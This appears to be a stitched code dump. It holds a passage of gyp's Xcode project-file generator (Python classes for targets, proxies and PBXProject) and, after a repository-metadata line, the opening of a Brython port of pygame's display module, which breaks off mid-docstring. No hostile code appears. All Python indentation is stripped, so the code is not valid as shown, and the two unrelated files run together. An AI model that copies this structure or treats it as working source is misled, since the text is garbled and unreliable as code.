hashables.append(self._properties['filePatterns'])
return hashables
class PBXContainerItemProxy(XCObject):
# When referencing an item in this project file, containerPortal is the
# PBXProject root object of this project file. When referencing an item in
# another project file, containerPortal is a PBXFileReference identifying
# the other project file.
#
# When serving as a proxy to an XCTarget (in this project file or another),
# proxyType is 1. When serving as a proxy to a PBXFileReference (in another
# project file), proxyType is 2. Type 2 is used for references to the
# producs of the other project file's targets.
#
# Xcode is weird about remoteGlobalIDString. Usually, it's printed without
# a comment, indicating that it's tracked internally simply as a string, but
# sometimes it's printed with a comment (usually when the object is initially
# created), indicating that it's tracked as a project file object at least
# sometimes. This module always tracks it as an object, but contains a hack
# to prevent it from printing the comment in the project file output. See
# _XCKVPrint.
_schema = XCObject._schema.copy()
_schema.update({
'containerPortal': [0, XCContainerPortal, 0, 1],
'proxyType': [0, int, 0, 1],
'remoteGlobalIDString': [0, XCRemoteObject, 0, 1],
'remoteInfo': [0, str, 0, 1],
})
def __repr__(self):
props = self._properties
name = '%s.gyp:%s' % (props['containerPortal'].Name(), props['remoteInfo'])
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Name(self):
# Admittedly not the best name, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.extend(self._properties['containerPortal'].Hashables())
hashables.extend(self._properties['remoteGlobalIDString'].Hashables())
return hashables
class PBXTargetDependency(XCObject):
# The "target" property accepts an XCTarget object, and obviously not
# NoneType. But XCTarget is defined below, so it can't be put into the
# schema yet. The definition of PBXTargetDependency can't be moved below
# XCTarget because XCTarget's own schema references PBXTargetDependency.
# Python doesn't deal well with this circular relationship, and doesn't have
# a real way to do forward declarations. To work around, the type of
# the "target" property is reset below, after XCTarget is defined.
#
# At least one of "name" and "target" is required.
_schema = XCObject._schema.copy()
_schema.update({
'name': [0, str, 0, 0],
'target': [0, None.__class__, 0, 0],
'targetProxy': [0, PBXContainerItemProxy, 1, 1],
})
def __repr__(self):
name = self._properties.get('name') or self._properties['target'].Name()
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Name(self):
# Admittedly not the best name, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.extend(self._properties['targetProxy'].Hashables())
return hashables
class PBXReferenceProxy(XCFileLikeElement):
_schema = XCFileLikeElement._schema.copy()
_schema.update({
'fileType': [0, str, 0, 1],
'path': [0, str, 0, 1],
'remoteRef': [0, PBXContainerItemProxy, 1, 1],
})
class XCTarget(XCRemoteObject):
# An XCTarget is really just an XCObject, the XCRemoteObject thing is just
# to allow PBXProject to be used in the remoteGlobalIDString property of
# PBXContainerItemProxy.
#
# Setting a "name" property at instantiation may also affect "productName",
# which may in turn affect the "PRODUCT_NAME" build setting in children of
# "buildConfigurationList". See __init__ below.
_schema = XCRemoteObject._schema.copy()
_schema.update({
'buildConfigurationList': [0, XCConfigurationList, 1, 1,
XCConfigurationList()],
'buildPhases': [1, XCBuildPhase, 1, 1, []],
'dependencies': [1, PBXTargetDependency, 1, 1, []],
'name': [0, str, 0, 1],
'productName': [0, str, 0, 1],
})
def __init__(self, properties=None, id=None, parent=None,
force_outdir=None, force_prefix=None, force_extension=None):
# super
XCRemoteObject.__init__(self, properties, id, parent)
# Set up additional defaults not expressed in the schema. If a "name"
# property was supplied, set "productName" if it is not present. Also set
# the "PRODUCT_NAME" build setting in each configuration, but only if
# the setting is not present in any build configuration.
if 'name' in self._properties:
if not 'productName' in self._properties:
self.SetProperty('productName', self._properties['name'])
if 'productName' in self._properties:
if 'buildConfigurationList' in self._properties:
configs = self._properties['buildConfigurationList']
if configs.HasBuildSetting('PRODUCT_NAME') == 0:
configs.SetBuildSetting('PRODUCT_NAME',
self._properties['productName'])
def AddDependency(self, other):
pbxproject = self.PBXProjectAncestor()
other_pbxproject = other.PBXProjectAncestor()
if pbxproject == other_pbxproject:
# Add a dependency to another target in the same project file.
container = PBXContainerItemProxy({'containerPortal': pbxproject,
'proxyType': 1,
'remoteGlobalIDString': other,
'remoteInfo': other.Name()})
dependency = PBXTargetDependency({'target': other,
'targetProxy': container})
self.AppendProperty('dependencies', dependency)
else:
# Add a dependency to a target in a different project file.
other_project_ref = \
pbxproject.AddOrGetProjectReference(other_pbxproject)[1]
container = PBXContainerItemProxy({
'containerPortal': other_project_ref,
'proxyType': 1,
'remoteGlobalIDString': other,
'remoteInfo': other.Name(),
})
dependency = PBXTargetDependency({'name': other.Name(),
'targetProxy': container})
self.AppendProperty('dependencies', dependency)
# Proxy all of these through to the build configuration list.
def ConfigurationNamed(self, name):
return self._properties['buildConfigurationList'].ConfigurationNamed(name)
def DefaultConfiguration(self):
return self._properties['buildConfigurationList'].DefaultConfiguration()
def HasBuildSetting(self, key):
return self._properties['buildConfigurationList'].HasBuildSetting(key)
def GetBuildSetting(self, key):
return self._properties['buildConfigurationList'].GetBuildSetting(key)
def SetBuildSetting(self, key, value):
return self._properties['buildConfigurationList'].SetBuildSetting(key, \
value)
def AppendBuildSetting(self, key, value):
return self._properties['buildConfigurationList'].AppendBuildSetting(key, \
value)
def DelBuildSetting(self, key):
return self._properties['buildConfigurationList'].DelBuildSetting(key)
# Redefine the type of the "target" property. See PBXTargetDependency._schema
# above.
PBXTargetDependency._schema['target'][1] = XCTarget
class PBXNativeTarget(XCTarget):
# buildPhases is overridden in the schema to be able to set defaults.
#
# NOTE: Contrary to most objects, it is advisable to set parent when
# constructing PBXNativeTarget. A parent of an XCTarget must be a PBXProject
# object. A parent reference is required for a PBXNativeTarget during
# construction to be able to set up the target defaults for productReference,
# because a PBXBuildFile object must be created for the target and it must
# be added to the PBXProject's mainGroup hierarchy.
_schema = XCTarget._schema.copy()
_schema.update({
'buildPhases': [1, XCBuildPhase, 1, 1,
[PBXSourcesBuildPhase(), PBXFrameworksBuildPhase()]],
'buildRules': [1, PBXBuildRule, 1, 1, []],
'productReference': [0, PBXFileReference, 0, 1],
'productType': [0, str, 0, 1],
})
# Mapping from Xcode product-types to settings. The settings are:
# filetype : used for explicitFileType in the project file
# prefix : the prefix for the file name
# suffix : the suffix for the file name
_product_filetypes = {
'com.apple.product-type.application': ['wrapper.application',
'', '.app'],
'com.apple.product-type.application.watchapp': ['wrapper.application',
'', '.app'],
'com.apple.product-type.watchkit-extension': ['wrapper.app-extension',
'', '.appex'],
'com.apple.product-type.app-extension': ['wrapper.app-extension',
'', '.appex'],
'com.apple.product-type.bundle': ['wrapper.cfbundle',
'', '.bundle'],
'com.apple.product-type.framework': ['wrapper.framework',
'', '.framework'],
'com.apple.product-type.library.dynamic': ['compiled.mach-o.dylib',
'lib', '.dylib'],
'com.apple.product-type.library.static': ['archive.ar',
'lib', '.a'],
'com.apple.product-type.tool': ['compiled.mach-o.executable',
'', ''],
'com.apple.product-type.bundle.unit-test': ['wrapper.cfbundle',
'', '.xctest'],
'com.googlecode.gyp.xcode.bundle': ['compiled.mach-o.dylib',
'', '.so'],
'com.apple.product-type.kernel-extension': ['wrapper.kext',
'', '.kext'],
}
def __init__(self, properties=None, id=None, parent=None,
force_outdir=None, force_prefix=None, force_extension=None):
# super
XCTarget.__init__(self, properties, id, parent)
if 'productName' in self._properties and \
'productType' in self._properties and \
not 'productReference' in self._properties and \
self._properties['productType'] in self._product_filetypes:
products_group = None
pbxproject = self.PBXProjectAncestor()
if pbxproject != None:
products_group = pbxproject.ProductsGroup()
if products_group != None:
(filetype, prefix, suffix) = \
self._product_filetypes[self._properties['productType']]
# Xcode does not have a distinct type for loadable modules that are
# pure BSD targets (not in a bundle wrapper). GYP allows such modules
# to be specified by setting a target type to loadable_module without
# having mac_bundle set. These are mapped to the pseudo-product type
# com.googlecode.gyp.xcode.bundle.
#
# By picking up this special type and converting it to a dynamic
# library (com.apple.product-type.library.dynamic) with fix-ups,
# single-file loadable modules can be produced.
#
# MACH_O_TYPE is changed to mh_bundle to produce the proper file type
# (as opposed to mh_dylib). In order for linking to succeed,
# DYLIB_CURRENT_VERSION and DYLIB_COMPATIBILITY_VERSION must be
# cleared. They are meaningless for type mh_bundle.
#
# Finally, the .so extension is forcibly applied over the default
# (.dylib), unless another forced extension is already selected.
# .dylib is plainly wrong, and .bundle is used by loadable_modules in
# bundle wrappers (com.apple.product-type.bundle). .so seems an odd
# choice because it's used as the extension on many other systems that
# don't distinguish between linkable shared libraries and non-linkable
# loadable modules, but there's precedent: Python loadable modules on
# Mac OS X use an .so extension.
if self._properties['productType'] == 'com.googlecode.gyp.xcode.bundle':
self._properties['productType'] = \
'com.apple.product-type.library.dynamic'
self.SetBuildSetting('MACH_O_TYPE', 'mh_bundle')
self.SetBuildSetting('DYLIB_CURRENT_VERSION', '')
self.SetBuildSetting('DYLIB_COMPATIBILITY_VERSION', '')
if force_extension is None:
force_extension = suffix[1:]
if self._properties['productType'] == \
'com.apple.product-type-bundle.unit.test':
if force_extension is None:
force_extension = suffix[1:]
if force_extension is not None:
# If it's a wrapper (bundle), set WRAPPER_EXTENSION.
# Extension override.
suffix = '.' + force_extension
if filetype.startswith('wrapper.'):
self.SetBuildSetting('WRAPPER_EXTENSION', force_extension)
else:
self.SetBuildSetting('EXECUTABLE_EXTENSION', force_extension)
if filetype.startswith('compiled.mach-o.executable'):
product_name = self._properties['productName']
product_name += suffix
suffix = ''
self.SetProperty('productName', product_name)
self.SetBuildSetting('PRODUCT_NAME', product_name)
# Xcode handles most prefixes based on the target type, however there
# are exceptions. If a "BSD Dynamic Library" target is added in the
# Xcode UI, Xcode sets EXECUTABLE_PREFIX. This check duplicates that
# behavior.
if force_prefix is not None:
prefix = force_prefix
if filetype.startswith('wrapper.'):
self.SetBuildSetting('WRAPPER_PREFIX', prefix)
else:
self.SetBuildSetting('EXECUTABLE_PREFIX', prefix)
if force_outdir is not None:
self.SetBuildSetting('TARGET_BUILD_DIR', force_outdir)
# TODO(tvl): Remove the below hack.
# http://code.google.com/p/gyp/issues/detail?id=122
# Some targets include the prefix in the target_name. These targets
# really should just add a product_name setting that doesn't include
# the prefix. For example:
# target_name = 'libevent', product_name = 'event'
# This check cleans up for them.
product_name = self._properties['productName']
prefix_len = len(prefix)
if prefix_len and (product_name[:prefix_len] == prefix):
product_name = product_name[prefix_len:]
self.SetProperty('productName', product_name)
self.SetBuildSetting('PRODUCT_NAME', product_name)
ref_props = {
'explicitFileType': filetype,
'includeInIndex': 0,
'path': prefix + product_name + suffix,
'sourceTree': 'BUILT_PRODUCTS_DIR',
}
file_ref = PBXFileReference(ref_props)
products_group.AppendChild(file_ref)
self.SetProperty('productReference', file_ref)
def GetBuildPhaseByType(self, type):
if not 'buildPhases' in self._properties:
return None
the_phase = None
for phase in self._properties['buildPhases']:
if isinstance(phase, type):
# Some phases may be present in multiples in a well-formed project file,
# but phases like PBXSourcesBuildPhase may only be present singly, and
# this function is intended as an aid to GetBuildPhaseByType. Loop
# over the entire list of phases and assert if more than one of the
# desired type is found.
assert the_phase is None
the_phase = phase
return the_phase
def HeadersPhase(self):
headers_phase = self.GetBuildPhaseByType(PBXHeadersBuildPhase)
if headers_phase is None:
headers_phase = PBXHeadersBuildPhase()
# The headers phase should come before the resources, sources, and
# frameworks phases, if any.
insert_at = len(self._properties['buildPhases'])
for index in xrange(0, len(self._properties['buildPhases'])):
phase = self._properties['buildPhases'][index]
if isinstance(phase, PBXResourcesBuildPhase) or \
isinstance(phase, PBXSourcesBuildPhase) or \
isinstance(phase, PBXFrameworksBuildPhase):
insert_at = index
break
self._properties['buildPhases'].insert(insert_at, headers_phase)
headers_phase.parent = self
return headers_phase
def ResourcesPhase(self):
resources_phase = self.GetBuildPhaseByType(PBXResourcesBuildPhase)
if resources_phase is None:
resources_phase = PBXResourcesBuildPhase()
# The resources phase should come before the sources and frameworks
# phases, if any.
insert_at = len(self._properties['buildPhases'])
for index in xrange(0, len(self._properties['buildPhases'])):
phase = self._properties['buildPhases'][index]
if isinstance(phase, PBXSourcesBuildPhase) or \
isinstance(phase, PBXFrameworksBuildPhase):
insert_at = index
break
self._properties['buildPhases'].insert(insert_at, resources_phase)
resources_phase.parent = self
return resources_phase
def SourcesPhase(self):
sources_phase = self.GetBuildPhaseByType(PBXSourcesBuildPhase)
if sources_phase is None:
sources_phase = PBXSourcesBuildPhase()
self.AppendProperty('buildPhases', sources_phase)
return sources_phase
def FrameworksPhase(self):
frameworks_phase = self.GetBuildPhaseByType(PBXFrameworksBuildPhase)
if frameworks_phase is None:
frameworks_phase = PBXFrameworksBuildPhase()
self.AppendProperty('buildPhases', frameworks_phase)
return frameworks_phase
def AddDependency(self, other):
# super
XCTarget.AddDependency(self, other)
static_library_type = 'com.apple.product-type.library.static'
shared_library_type = 'com.apple.product-type.library.dynamic'
framework_type = 'com.apple.product-type.framework'
if isinstance(other, PBXNativeTarget) and \
'productType' in self._properties and \
self._properties['productType'] != static_library_type and \
'productType' in other._properties and \
(other._properties['productType'] == static_library_type or \
((other._properties['productType'] == shared_library_type or \
other._properties['productType'] == framework_type) and \
((not other.HasBuildSetting('MACH_O_TYPE')) or
other.GetBuildSetting('MACH_O_TYPE') != 'mh_bundle'))):
file_ref = other.GetProperty('productReference')
pbxproject = self.PBXProjectAncestor()
other_pbxproject = other.PBXProjectAncestor()
if pbxproject != other_pbxproject:
other_project_product_group = \
pbxproject.AddOrGetProjectReference(other_pbxproject)[0]
file_ref = other_project_product_group.GetChildByRemoteObject(file_ref)
self.FrameworksPhase().AppendProperty('files',
PBXBuildFile({'fileRef': file_ref}))
class PBXAggregateTarget(XCTarget):
pass
class PBXProject(XCContainerPortal):
# A PBXProject is really just an XCObject, the XCContainerPortal thing is
# just to allow PBXProject to be used in the containerPortal property of
# PBXContainerItemProxy.
"""
Attributes:
path: "sample.xcodeproj". TODO(mark) Document me!
_other_pbxprojects: A dictionary, keyed by other PBXProject objects. Each
value is a reference to the dict in the
projectReferences list associated with the keyed
PBXProject.
"""
_schema = XCContainerPortal._schema.copy()
_schema.update({
'attributes': [0, dict, 0, 0],
'buildConfigurationList': [0, XCConfigurationList, 1, 1,
XCConfigurationList()],
'compatibilityVersion': [0, str, 0, 1, 'Xcode 3.2'],
'hasScannedForEncodings': [0, int, 0, 1, 1],
'mainGroup': [0, PBXGroup, 1, 1, PBXGroup()],
'projectDirPath': [0, str, 0, 1, ''],
'projectReferences': [1, dict, 0, 0],
'projectRoot': [0, str, 0, 1, ''],
'targets': [1, XCTarget, 1, 1, []],
})
def __init__(self, properties=None, id=None, parent=None, path=None):
self.path = path
self._other_pbxprojects = {}
# super
return XCContainerPortal.__init__(self, properties, id, parent)
def Name(self):
name = self.path
if name[-10:] == '.xcodeproj':
name = name[:-10]
return posixpath.basename(name)
def Path(self):
return self.path
def Comment(self):
return 'Project object'
def Children(self):
# super
children = XCContainerPortal.Children(self)
# Add children that the schema doesn't know about. Maybe there's a more
# elegant way around this, but this is the only case where we need to own
# objects in a dictionary (that is itself in a list), and three lines for
# a one-off isn't that big a deal.
if 'projectReferences' in self._properties:
for reference in self._properties['projectReferences']:
children.append(reference['ProductGroup'])
return children
def PBXProjectAncestor(self):
return self
def _GroupByName(self, name):
if not 'mainGroup' in self._properties:
self.SetProperty('mainGroup', PBXGroup())
main_group = self._properties['mainGroup']
group = main_group.GetChildByName(name)
if group is None:
group = PBXGroup({'name': name})
main_group.AppendChild(group)
return group
# SourceGroup and ProductsGroup are created by default in Xcode's own
# templates.
def SourceGroup(self):
return self._GroupByName('Source')
def ProductsGroup(self):
return self._GroupByName('Products')
# IntermediatesGroup is used to collect source-like files that are generated
# by rules or script phases and are placed in intermediate directories such
# as DerivedSources.
def IntermediatesGroup(self):
return self._GroupByName('Intermediates')
# FrameworksGroup and ProjectsGroup are top-level groups used to collect
# frameworks and projects.
def FrameworksGroup(self):
return self._GroupByName('Frameworks')
def ProjectsGroup(self):
return self._GroupByName('Projects')
def RootGroupForPath(self, path):
"""Returns a PBXGroup child of this object to which path should be added.
This method is intended to choose between SourceGroup and
IntermediatesGroup on the basis of whether path is present in a source
directory or an intermediates directory. For the purposes of this
determination, any path located within a derived file directory such as
PROJECT_DERIVED_FILE_DIR is treated as being in an intermediates
directory.
The returned value is a two-element tuple. The first element is the
PBXGroup, and the second element specifies whether that group should be
organized hierarchically (True) or as a single flat list (False).
"""
# TODO(mark): make this a class variable and bind to self on call?
# Also, this list is nowhere near exhaustive.
# INTERMEDIATE_DIR and SHARED_INTERMEDIATE_DIR are used by
# gyp.generator.xcode. There should probably be some way for that module
# to push the names in, rather than having to hard-code them here.
source_tree_groups = {
'DERIVED_FILE_DIR': (self.IntermediatesGroup, True),
'INTERMEDIATE_DIR': (self.IntermediatesGroup, True),
'PROJECT_DERIVED_FILE_DIR': (self.IntermediatesGroup, True),
'SHARED_INTERMEDIATE_DIR': (self.IntermediatesGroup, True),
}
(source_tree, path) = SourceTreeAndPathFromPath(path)
if source_tree != None and source_tree in source_tree_groups:
(group_func, hierarchical) = source_tree_groups[source_tree]
group = group_func()
return (group, hierarchical)
# TODO(mark): make additional choices based on file extension.
return (self.SourceGroup(), True)
def AddOrGetFileInRootGroup(self, path):
"""Returns a PBXFileReference corresponding to path in the correct group
according to RootGroupForPath's heuristics.
If an existing PBXFileReference for path exists, it will be returned.
Otherwise, one will be created and returned.
"""
(group, hierarchical) = self.RootGroupForPath(path)
return group.AddOrGetFileByPath(path, hierarchical)
def RootGroupsTakeOverOnlyChildren(self, recurse=False):
"""Calls TakeOverOnlyChild for all groups in the main group."""
for group in self._properties['mainGroup']._properties['children']:
if isinstance(group, PBXGroup):
group.TakeOverOnlyChild(recurse)
def SortGroups(self):
# Sort the children of the mainGroup (like "Source" and "Products")
# according to their defined order.
self._properties['mainGroup']._properties['children'] = \
sorted(self._properties['mainGroup']._properties['children'],
cmp=lambda x,y: x.CompareRootGroup(y))
# Sort everything else by putting group before files, and going
# alphabetically by name within sections of groups and files. SortGroup
# is recursive.
for group in self._properties['mainGroup']._properties['children']:
if not isinstance(group, PBXGroup):
continue
if group.Name() == 'Products':
# The Products group is a special case. Instead of sorting
# alphabetically, sort things in the order of the targets that
# produce the products. To do this, just build up a new list of
# products based on the targets.
products = []
for target in self._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
product = target._properties['productReference']
# Make sure that the product is already in the products group.
assert product in group._properties['children']
products.append(product)
# Make sure that this process doesn't miss anything that was already
# in the products group.
assert len(products) == len(group._properties['children'])
group._properties['children'] = products
else:
group.SortGroup()
def AddOrGetProjectReference(self, other_pbxproject):
"""Add a reference to another project file (via PBXProject object) to this
one.
Returns [ProductGroup, ProjectRef]. ProductGroup is a PBXGroup object in
this project file that contains a PBXReferenceProxy object for each
product of each PBXNativeTarget in the other project file. ProjectRef is
a PBXFileReference to the other project file.
If this project file already references the other project file, the
existing ProductGroup and ProjectRef are returned. The ProductGroup will
still be updated if necessary.
"""
if not 'projectReferences' in self._properties:
self._properties['projectReferences'] = []
product_group = None
project_ref = None
if not other_pbxproject in self._other_pbxprojects:
# This project file isn't yet linked to the other one. Establish the
# link.
product_group = PBXGroup({'name': 'Products'})
# ProductGroup is strong.
product_group.parent = self
# There's nothing unique about this PBXGroup, and if left alone, it will
# wind up with the same set of hashables as all other PBXGroup objects
# owned by the projectReferences list. Add the hashables of the
# remote PBXProject that it's related to.
product_group._hashables.extend(other_pbxproject.Hashables())
# The other project reports its path as relative to the same directory
# that this project's path is relative to. The other project's path
# is not necessarily already relative to this project. Figure out the
# pathname that this project needs to use to refer to the other one.
this_path = posixpath.dirname(self.Path())
projectDirPath = self.GetProperty('projectDirPath')
if projectDirPath:
if posixpath.isabs(projectDirPath[0]):
this_path = projectDirPath
else:
this_path = posixpath.join(this_path, projectDirPath)
other_path = gyp.common.RelativePath(other_pbxproject.Path(), this_path)
# ProjectRef is weak (it's owned by the mainGroup hierarchy).
project_ref = PBXFileReference({
'lastKnownFileType': 'wrapper.pb-project',
'path': other_path,
'sourceTree': 'SOURCE_ROOT',
})
self.ProjectsGroup().AppendChild(project_ref)
ref_dict = {'ProductGroup': product_group, 'ProjectRef': project_ref}
self._other_pbxprojects[other_pbxproject] = ref_dict
self.AppendProperty('projectReferences', ref_dict)
# Xcode seems to sort this list case-insensitively
self._properties['projectReferences'] = \
sorted(self._properties['projectReferences'], cmp=lambda x,y:
cmp(x['ProjectRef'].Name().lower(),
y['ProjectRef'].Name().lower()))
else:
# The link already exists. Pull out the relevnt data.
project_ref_dict = self._other_pbxprojects[other_pbxproject]
product_group = project_ref_dict['ProductGroup']
project_ref = project_ref_dict['ProjectRef']
self._SetUpProductReferences(other_pbxproject, product_group, project_ref)
inherit_unique_symroot = self._AllSymrootsUnique(other_pbxproject, False)
targets = other_pbxproject.GetProperty('targets')
if all(self._AllSymrootsUnique(t, inherit_unique_symroot) for t in targets):
dir_path = project_ref._properties['path']
product_group._hashables.extend(dir_path)
return [product_group, project_ref]
def _AllSymrootsUnique(self, target, inherit_unique_symroot):
# Returns True if all configurations have a unique 'SYMROOT' attribute.
# The value of inherit_unique_symroot decides, if a configuration is assumed
# to inherit a unique 'SYMROOT' attribute from its parent, if it doesn't
# define an explicit value for 'SYMROOT'.
symroots = self._DefinedSymroots(target)
for s in self._DefinedSymroots(target):
if (s is not None and not self._IsUniqueSymrootForTarget(s) or
s is None and not inherit_unique_symroot):
return False
return True if symroots else inherit_unique_symroot
def _DefinedSymroots(self, target):
# Returns all values for the 'SYMROOT' attribute defined in all
# configurations for this target. If any configuration doesn't define the
# 'SYMROOT' attribute, None is added to the returned set. If all
# configurations don't define the 'SYMROOT' attribute, an empty set is
# returned.
config_list = target.GetProperty('buildConfigurationList')
symroots = set()
for config in config_list.GetProperty('buildConfigurations'):
setting = config.GetProperty('buildSettings')
if 'SYMROOT' in setting:
symroots.add(setting['SYMROOT'])
else:
symroots.add(None)
if len(symroots) == 1 and None in symroots:
return set()
return symroots
def _IsUniqueSymrootForTarget(self, symroot):
# This method returns True if all configurations in target contain a
# 'SYMROOT' attribute that is unique for the given target. A value is
# unique, if the Xcode macro '$SRCROOT' appears in it in any form.
uniquifier = ['$SRCROOT', '$(SRCROOT)']
if any(x in symroot for x in uniquifier):
return True
return False
def _SetUpProductReferences(self, other_pbxproject, product_group,
project_ref):
# TODO(mark): This only adds references to products in other_pbxproject
# when they don't exist in this pbxproject. Perhaps it should also
# remove references from this pbxproject that are no longer present in
# other_pbxproject. Perhaps it should update various properties if they
# change.
for target in other_pbxproject._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
other_fileref = target._properties['productReference']
if product_group.GetChildByRemoteObject(other_fileref) is None:
# Xcode sets remoteInfo to the name of the target and not the name
# of its product, despite this proxy being a reference to the product.
container_item = PBXContainerItemProxy({
'containerPortal': project_ref,
'proxyType': 2,
'remoteGlobalIDString': other_fileref,
'remoteInfo': target.Name()
})
# TODO(mark): Does sourceTree get copied straight over from the other
# project? Can the other project ever have lastKnownFileType here
# instead of explicitFileType? (Use it if so?) Can path ever be
# unset? (I don't think so.) Can other_fileref have name set, and
# does it impact the PBXReferenceProxy if so? These are the questions
# that perhaps will be answered one day.
reference_proxy = PBXReferenceProxy({
'fileType': other_fileref._properties['explicitFileType'],
'path': other_fileref._properties['path'],
'sourceTree': other_fileref._properties['sourceTree'],
'remoteRef': container_item,
})
product_group.AppendChild(reference_proxy)
def SortRemoteProductReferences(self):
# For each remote project file, sort the associated ProductGroup in the
# same order that the targets are sorted in the remote project file. This
# is the sort order used by Xcode.
def CompareProducts(x, y, remote_products):
# x and y are PBXReferenceProxy objects. Go through their associated
# PBXContainerItem to get the remote PBXFileReference, which will be
# present in the remote_products list.
x_remote = x._properties['remoteRef']._properties['remoteGlobalIDString']
y_remote = y._properties['remoteRef']._properties['remoteGlobalIDString']
x_index = remote_products.index(x_remote)
y_index = remote_products.index(y_remote)
# Use the order of each remote PBXFileReference in remote_products to
# determine the sort order.
return cmp(x_index, y_index)
for other_pbxproject, ref_dict in self._other_pbxprojects.iteritems():
# Build up a list of products in the remote project file, ordered the
# same as the targets that produce them.
remote_products = []
for target in other_pbxproject._properties['targets']:
if not isinstance(target, PBXNativeTarget):
continue
remote_products.append(target._properties['productReference'])
# Sort the PBXReferenceProxy children according to the list of remote
# products.
product_group = ref_dict['ProductGroup']
product_group._properties['children'] = sorted(
product_group._properties['children'],
cmp=lambda x, y, rp=remote_products: CompareProducts(x, y, rp))
class XCProjectFile(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'archiveVersion': [0, int, 0, 1, 1],
'classes': [0, dict, 0, 1, {}],
'objectVersion': [0, int, 0, 1, 46],
'rootObject': [0, PBXProject, 1, 1],
})
def ComputeIDs(self, recursive=True, overwrite=True, hash=None):
# Although XCProjectFile is implemented here as an XCObject, it's not a
# proper object in the Xcode sense, and it certainly doesn't have its own
# ID. Pass through an attempt to update IDs to the real root object.
if recursive:
self._properties['rootObject'].ComputeIDs(recursive, overwrite, hash)
def Print(self, file=sys.stdout):
self.VerifyHasRequiredProperties()
# Add the special "objects" property, which will be caught and handled
# separately during printing. This structure allows a fairly standard
# loop do the normal printing.
self._properties['objects'] = {}
self._XCPrint(file, 0, '// !$*UTF8*$!\n')
if self._should_print_single_line:
self._XCPrint(file, 0, '{ ')
else:
self._XCPrint(file, 0, '{\n')
for property, value in sorted(self._properties.iteritems(),
cmp=lambda x, y: cmp(x, y)):
if property == 'objects':
self._PrintObjects(file)
else:
self._XCKVPrint(file, 1, property, value)
self._XCPrint(file, 0, '}\n')
del self._properties['objects']
def _PrintObjects(self, file):
if self._should_print_single_line:
self._XCPrint(file, 0, 'objects = {')
else:
self._XCPrint(file, 1, 'objects = {\n')
objects_by_class = {}
for object in self.Descendants():
if object == self:
continue
class_name = object.__class__.__name__
if not class_name in objects_by_class:
objects_by_class[class_name] = []
objects_by_class[class_name].append(object)
for class_name in sorted(objects_by_class):
self._XCPrint(file, 0, '\n')
self._XCPrint(file, 0, '/* Begin ' + class_name + ' section */\n')
for object in sorted(objects_by_class[class_name],
cmp=lambda x, y: cmp(x.id, y.id)):
object.Print(file)
self._XCPrint(file, 0, '/* End ' + class_name + ' section */\n')
if self._should_print_single_line:
self._XCPrint(file, 0, '}; ')
else:
self._XCPrint(file, 1, '};\n')
| mit |
40223220/2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/site-packages/pygame/display.py | 603 | 25179 | #!/usr/bin/env python
'''Pygame module to control the display window and screen.
This module offers control over the pygame display. Pygame has a single display
Surface that is either contained in a window or runs full screen. Once you
create the display you treat it as a regular Surface. Changes are not
immediately visible onscreen, you must choose one of the two flipping functions
to update the actual display.
The pygame display can actually be initialized in one of several modes. By
default the display is a basic software driven framebuffer. You can request
special modules like hardware acceleration and OpenGL support. These are
controlled by flags passed to pygame.display.set_mode().
Pygame can only have a single display active at any time. Creating a new one
with pygame.display.set_mode() will close the previous display. If precise
control is needed over the pixel format or display resolutions, use the
functions pygame.display.mode_ok(), pygame.display.list_modes(), and
pygame.display.Info() to query information about the display.
Once the display Surface is created, the functions from this module
effect the single existing display. The Surface becomes invalid if the module
is uninitialized. If a new display mode is set, the existing Surface will
automatically switch to operate on the new display.
Then the display mode is set, several events are placed on the pygame
event queue. pygame.QUIT is sent when the user has requested the program
to shutdown. The window will receive pygame.ACTIVEEVENT events as the
display gains and loses input focus. If the display is set with the
pygame.RESIZABLE flag, pygame.VIDEORESIZE events will be sent when the
user adjusts the window dimensions. Hardware displays that draw direct
to the screen will get pygame.VIDEOEXPOSE events when portions of the
window must be redrawn.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import sys
from SDL import *
import pygame.base
import pygame.pkgdata
import pygame.surface
#brython
import pygame.constants
from browser import window
#from javascript import console
_display_surface = None
_icon_was_set = 0
_icon_defaultname = 'pygame_icon.bmp'
_init_video=False
def __PYGAMEinit__():
pygame.base.register_quit(_display_autoquit)
def _display_autoquit():
global _display_surface
_display_surface = None
def init():
'''Initialize the display module.
Initializes the pygame display module. The display module cannot do
anything until it is initialized. This is usually handled for you
automatically when you call the higher level `pygame.init`.
Pygame will select from one of several internal display backends when it
is initialized. The display mode will be chosen depending on the platform
and permissions of current user. Before the display module is initialized
the environment variable SDL_VIDEODRIVER can be set to control which
backend is used. The systems with multiple choices are listed here.
Windows
windib, directx
Unix
x11, dga, fbcon, directfb, ggi, vgl, svgalib, aalib
On some platforms it is possible to embed the pygame display into an already
existing window. To do this, the environment variable SDL_WINDOWID must be
set to a string containing the window id or handle. The environment variable
is checked when the pygame display is initialized. Be aware that there can
be many strange side effects when running in an embedded display.
It is harmless to call this more than once, repeated calls have no effect.
'''
pygame.base._video_autoinit()
__PYGAMEinit__()
def quit():
'''Uninitialize the display module.
This will shut down the entire display module. This means any active
displays will be closed. This will also be handled automatically when the
program exits.
It is harmless to call this more than once, repeated calls have no effect.
'''
pygame.base._video_autoquit()
_display_autoquit()
def get_init():
'''Get status of display module initialization.
:rtype: bool
:return: True if SDL's video system is currently initialized.
'''
return SDL_WasInit(SDL_INIT_VIDEO) != 0
def set_mode(resolution, flags=0, depth=0):
'''Initialize a window or screen for display.
This function will create a display Surface. The arguments passed in are
requests for a display type. The actual created display will be the best
possible match supported by the system.
The `resolution` argument is a pair of numbers representing the width and
height. The `flags` argument is a collection of additional options.
The `depth` argument represents the number of bits to use for color.
The Surface that gets returned can be drawn to like a regular Surface but
changes will eventually be seen on the monitor.
It is usually best to not pass the depth argument. It will default to the
best and fastest color depth for the system. If your game requires a
specific color format you can control the depth with this argument. Pygame
will emulate an unavailable color depth which can be slow.
When requesting fullscreen display modes, sometimes an exact match for the
requested resolution cannot be made. In these situations pygame will select
